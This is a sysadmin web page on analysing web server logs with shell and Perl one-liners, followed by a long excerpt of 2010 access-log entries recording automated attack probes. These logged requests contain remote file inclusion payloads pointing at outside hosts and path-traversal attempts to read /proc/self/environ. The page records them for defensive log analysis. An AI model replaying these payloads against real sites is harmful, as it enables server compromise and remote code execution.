Softpanorama

May the source be with you, but remember the KISS principle ;-)
Contents Bulletin Scripting in shell and Perl Network troubleshooting History Humor

HTTP Servers Log Analyses

News Enterprise Logs  Infrastructure Recommended Links  AWStats Apache Webserver Perl HTTP Logs Processing Scripts  mod rewrite
Requests for non-existing web pages Referrer Spam PHP probes Requests for crossdomain.xml and other XML files Mystery GET requests with URI scheme encoded PNG image in them Lower case requests Trailing junk in requests
Bangers Bots that cause consistent 500 errors Broken or undebugged robots Requests for crossdomain.xml and other XML files Frivolous POSTs Non-PHP Web probes .htaccess file
Probes from bc.googleusercontent.com Fighting rogue robots Bots that couse consistent 500 errors Large Sample of "Composition URL" fake hits Pitfalls of Google as a Search Engine Log rotation Squid Log analysers
HTTP Return Codes Apache authentication and authorization using LDAP HTTP Protocol Cheap Web hosting with SSH access Web site monitoring Web Humor Sysadmin Horror Stories

Perl was the language designed for processing texts was it shines in this particular task. No other scripting language generally comes close.

Simple analysis of http server logs can be done using just Perl (or other scripting language) and pipes. Very useful reports can be generated this way. But the problem here is that Web server logs are now polluted and it is not easy to distinguish legitimate requests that failed with code 404 (page not found) and bogus request from the army of zombies accessing the website day and night. See Requests for non-existing web pages. That makes traditional log analyzers like AWstats much less useful. The only information in 404 section of AWstats that is fed with raw logs is information about the level of activities of zombies, not so much about pages or images that might be missing. So before you apply AWstats to your logs they need to be pre-filtered with custom Perl script.  This is impossible to do in case you are using Cheap Web hosting provider so the problem is real and painful.

The same is true for successful hits.  I have many cases when a particular page suddenly goes to the top ten in popularity and then discover that it is due to some script that is retrieving it in a loop.  Sometime not the whole page but just the header.

Generally approximately 6% of total IP space are malignant users. For example, if the total size of IP address space is 100K addresses then approximately 6K of them are malignant users and robots. It is clear that it is impossible to block them using simple methods.   But you can and should deny access to the top abusers, let's say to a dozen addresses in each malignant access category.  Of course those IP sets overlap, as many robots are engaged in several types of malignant activities.

Generally for more or less popular web site malignant robots distort web statistic so significantly that without filtering them judgment about which pages of your site are popular (to say nothing about more complex question) is suspect. Usually those pages that you assume popular without filtering are result of activities of Referer Spammers or Bangers.  I saw cases when a page was accessed tens thousand of time a day and all accesses were "fake" -- supposedly coming from some undebugged robot, or as target of  some "is alive" type of script.  

Most web servers store their access log in what is called the "common log format." Each time a user requests a file from the server, a line containing the following fields is added to the end of the log file:

An extended version of this log format, often referred to as the "combined" format, includes two additional fields at the end:

Here is a very simple example of finding the most visited sites using pipes:

gzip -dc $1.gz | grep '" 200' | cut -d '"' -f 2 | cut -d '/' -f 3 | \ 
     '[:upper:]' '[:lower:]' | sort | uniq -c | sort -r > most_frequent

Note: Most tips were borrowed from ktmatu - One-liners by Matti Tukiainen. Some are modified. We assume that the web server log files (access_log*) are in Combined Format.

How to view log files without line wrapping ?

Less has option -S or --chop-long-lines Causes lines longer than the screen width to be chopped rather than folded. That is, the portion of a long line that does not fit in the screen width is not shown. The default is to fold long lines; that is, display the remainder on the next line.
less -S access_log

How many lines (hits) there are in the log file?

grep 200 access_log | wc -l 

How many page views?

gzip -dc access_log.gz | egrep -vc '(\.gif |\.jpg |\.png )' 
2569

How many hits today?

grep -c `date '+%d/%b/%Y'` access_log 
2569

How many unique visitors today?

grep `date '+%d/%b/%Y'` access_log | cut -d" " -f1 | sort -u | wc -l 
1196

How many hits in a particular day?

What period is covered covered in the log?

Are there missing dates?

How many corrupted log entries?

This is just a very quick and dirty way to check the log.

How does the line number 15927 or lines 15920 - 15929 look like?

How to figure out the bandwidth consumption (in bytes)?

How to delete partial GET requests from the log?

Partial content requests are usually generated by download managers to speed the downloading of big files and Adobe Acrobat Reader to fetch PDF documents page by page. In this example 206 requests generated by Acrobat reader are deleted so that they don't inflate the hit count.

grep -v '\.pdf .* 206 ' access_log > new_log

How to compress a selected portion from a log?

See in real-time how the log file grows?

Recently the number of "strange" access record in web logs jumped up and it became interesting to analyze the logs and see what those "strange" users are doing. Here is one fragment that I have found in 2010:

85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /Admin/Tivoli/TMF/Gateways/gateway_troubleshooting.shtml%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
67.223.224.130 - - [16/Aug/2010:07:14:51 -0600] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt?? HTTP/1.1" 302 824 "-" "libwww-perl/5.831"
67.223.224.130 - - [16/Aug/2010:07:14:52 -0600] "GET /400.shtml?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:37 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
85.236.38.205 - - [16/Aug/2010:07:42:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
89.111.176.226 - - [16/Aug/2010:07:43:47 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810"
89.111.176.226 - - [16/Aug/2010:07:43:50 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
125.164.72.146 - - [16/Aug/2010:07:48:59 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:00 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:01 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:08 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:09 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:10 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:19 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:20 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:21 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:40 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:41 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:42 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:43 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:44 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808"
125.164.72.146 - - [16/Aug/2010:07:49:45 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808"
91.121.1.124 - - [16/Aug/2010:07:52:17 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803"
91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803"
62.193.242.164 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813"
62.193.242.164 - - [16/Aug/2010:08:03:43 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813"
209.190.190.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/index.shtml/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /Scripting/php.shtml/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /Scripting/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:08:57:07 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
109.86.145.204 - - [16/Aug/2010:09:48:06 -0600] "GET /Malware/Malicious_web/Bulletin/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:07 -0600] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /Malware/Malicious_web/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 876 "-" "libwww-perl/5.810"
109.86.145.204 - - [16/Aug/2010:09:48:08 -0600] "GET /400.shtml?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810"
74.8.102.118 - - [16/Aug/2010:10:10:24 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.7dev.2 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/oss_for_solaris.shtml/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /Solaris/load_lang.php?_SERWEB[serwebdir]=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 826 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
222.122.13.12 - - [16/Aug/2010:11:03:39 -0600] "GET /400.shtml?_SERWEB%5bserwebdir%5d=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79"
84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /Solaris/Security/solaris_root_password_recovery.shtml////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 302 808 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:34 -0600] "GET /400.shtml?_SERVER%5bDOCUMENT_ROOT%5d=http://genol.fileave.com/MC22.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 747 "-" "libwww-perl/5.65"
84.242.142.98 - - [16/Aug/2010:11:42:35 -0600] "GET /Solaris/Security////?_SERVER[DOCUMENT_ROOT]=http://genol.fileave.com/MC22.txt? HTTP/1.1" 500 767 "-" "libwww-perl/5.65"
